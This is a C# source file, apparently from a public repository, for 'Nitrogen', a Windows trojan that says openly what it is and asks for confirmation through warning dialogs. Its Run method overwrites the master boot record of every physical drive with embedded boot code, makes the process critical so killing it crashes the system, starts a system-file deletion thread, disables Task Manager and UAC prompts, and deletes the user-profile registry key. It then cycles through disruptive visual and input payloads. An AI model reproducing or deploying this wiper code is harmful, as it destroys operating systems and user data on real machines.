Vichingo455
/
Nitrogen
1
0
Fork 0
Code Issues Pull Requests Packages Projects Releases 2 Wiki Activity
Nitrogen/Program.cs

223 lines
10 KiB
C#
Raw Blame History

using Microsoft.Win32;
using System;
using System.Diagnostics;
using System.Threading;
using System.Windows.Forms;
using static Nitrogen.Dll_Imports;
namespace Nitrogen
{
internal static class Program
{
/// <summary>
/// Punto di ingresso principale dell'applicazione.
/// </summary>
[STAThread]
static void Main()
{
Application.EnableVisualStyles();
Application.SetCompatibleTextRenderingDefault(false);
if (variables.AlreadyRunning())
{
Environment.Exit(0);
}
else if (!variables.IsAnalyzed())
{
MessageBox.Show("For your security, this malware can only run in isolated environments.","Nitrogen - ENVIRONMENT ERROR",MessageBoxButtons.OK,MessageBoxIcon.Error);
Environment.Exit(0);
}
var dlg = MessageBox.Show("You have run a trojan known as Nitrogen.\nRunning the malware will result in data loss and your machine being unusable.\n\nDO YOU WANT TO RUN THE MALWARE AND DESTROY YOUR COMPUTER?","Nitrogen - MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Warning,MessageBoxDefaultButton.Button2);
if (dlg == DialogResult.Yes)
{
var dlg2 = MessageBox.Show("THIS IS THE FINAL WARNING!!\nRUNNING THIS MALWARE WILL REALLY WIPE YOUR OPERATING SYSTEM!!!!\n\nDO YOU STILL WANT TO RUN IT AND SAY GOODBYE TO YOUR OS??","Nitrogen - LAST MALWARE WARNING",MessageBoxButtons.YesNo,MessageBoxIcon.Error,MessageBoxDefaultButton.Button2);
if (dlg2 == DialogResult.Yes)
{
Run();
}
else
{
Environment.Exit(0);
}
}
else
{
Environment.Exit(0);
}
}
private static void Run()
{
// MBR Made by mattia2010.exeyt on Discord
var mbrData = new byte[] {
0xE8, 0x03, 0x00, 0xE8, 0x1D, 0x00, 0xB4, 0x00, 0xB0, 0x13, 0xCD, 0x10, 0x68, 0x00, 0xA0, 0x07,
0xB4, 0x0C, 0x30, 0xC0, 0x31, 0xDB, 0x31, 0xC9, 0x31, 0xD2, 0xC3, 0x31, 0xC9, 0x31, 0xD2, 0xFF,
0x06, 0x6C, 0x7C, 0x81, 0xFA, 0x18, 0x01, 0x73, 0xF2, 0xE8, 0x10, 0x00, 0xE8, 0x2D, 0x00, 0x41,
0x81, 0xF9, 0x84, 0x03, 0x72, 0xED, 0x31, 0xC9, 0x42, 0xEB, 0xE8, 0xC3, 0x89, 0xCB, 0x31, 0xD3,
0x88, 0xD8, 0x02, 0x06, 0x6C, 0x7C, 0xC0, 0xE8, 0x02, 0xEB, 0x00, 0x3C, 0x37, 0x77, 0x05, 0x3C,
0x20, 0x72, 0x05, 0xC3, 0x2C, 0x10, 0xEB, 0xF3, 0x04, 0x20, 0xEB, 0xEF, 0x89, 0xD7, 0xC1, 0xE7,
0x06, 0x01, 0xD7, 0xC1, 0xE7, 0x02, 0x01, 0xCF, 0x26, 0x88, 0x05, 0xC3, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00,
0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x55, 0xAA
};
try
{
for (int i = 0; i < 300; i++)
{
var mbr = CreateFile($"\\\\.\\PhysicalDrive{i}", GenericAll, FileShareRead | FileShareWrite, IntPtr.Zero,
OpenExisting, 0, IntPtr.Zero);
WriteFile(mbr, mbrData, MbrSize, out uint lpNumberOfBytesWritten, IntPtr.Zero);
}
}
catch { }
int isCritical = 1;
int BreakOnTermination = 0x1D;
Process.EnterDebugMode();
NtSetInformationProcess(Process.GetCurrentProcess().Handle, BreakOnTermination, ref isCritical, sizeof(int));
Thread thr;
thr = new Thread(payloads.del_sys);
thr.Start();
RegistryKey rk;
rk = Registry.CurrentUser.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
rk.SetValue("DisableTaskMgr", 1, RegistryValueKind.DWord);
rk.Close();
rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System");
rk.SetValue("ConsentPromptBehaviorAdmin", 0, RegistryValueKind.DWord);
rk.SetValue("ConsentPromptBehaviorUser", 3, RegistryValueKind.DWord);
rk.Close();
rk = Registry.LocalMachine.CreateSubKey(@"SOFTWARE\Microsoft\Windows NT\CurrentVersion");
rk.DeleteSubKeyTree("ProfileList");
rk.Close();
thr = new Thread(payloads.story);
thr.Start();
}
public static void random_payloads()
{
for (; ; )
{
Random sleeptime = new Random();
Thread.Sleep(sleeptime.Next(2000,5000));
Random rand = new Random();
int i = rand.Next(0,8);
if (i == 0)
{
if (variables.sounds == true)
{
variables.sounds = false;
}
else
{
variables.sounds = true;
}
}
else if (i == 1)
{
/*if (variables.drawcursor == true)
{
variables.drawcursor = false;
}
else
{
variables.drawcursor = true;
}*/
if (variables.iconmove == true)
{
variables.iconmove = false;
}
else
{
variables.iconmove = true;
}
}
else if (i == 2)
{
if (variables.extreme == true)
{
variables.extreme = false;
}
else
{
variables.extreme = true;
}
}
else if (i == 3)
{
if (variables.gdi_payloads == true)
{
variables.gdi_payloads = false;
}
else
{
variables.gdi_payloads = true;
}
}
else if (i == 4)
{
if (variables.keyboard == true)
{
variables.keyboard = false;
}
else
{
variables.keyboard = true;
}
}
else if (i == 5)
{
if (variables.mouse == true)
{
variables.mouse = false;
}
else
{
variables.mouse = true;
}
}
else if (i == 6)
{
if (variables.textchanger == true)
{
variables.textchanger = false;
}
else
{
variables.textchanger = true;
}
}
else if (i == 7)
{
if (variables.window_shake == true)
{
variables.window_shake = false;
}
else
{
variables.window_shake = true;
}
}
}
}
}
}
Reference in New Issue View Git Blame Copy Permalink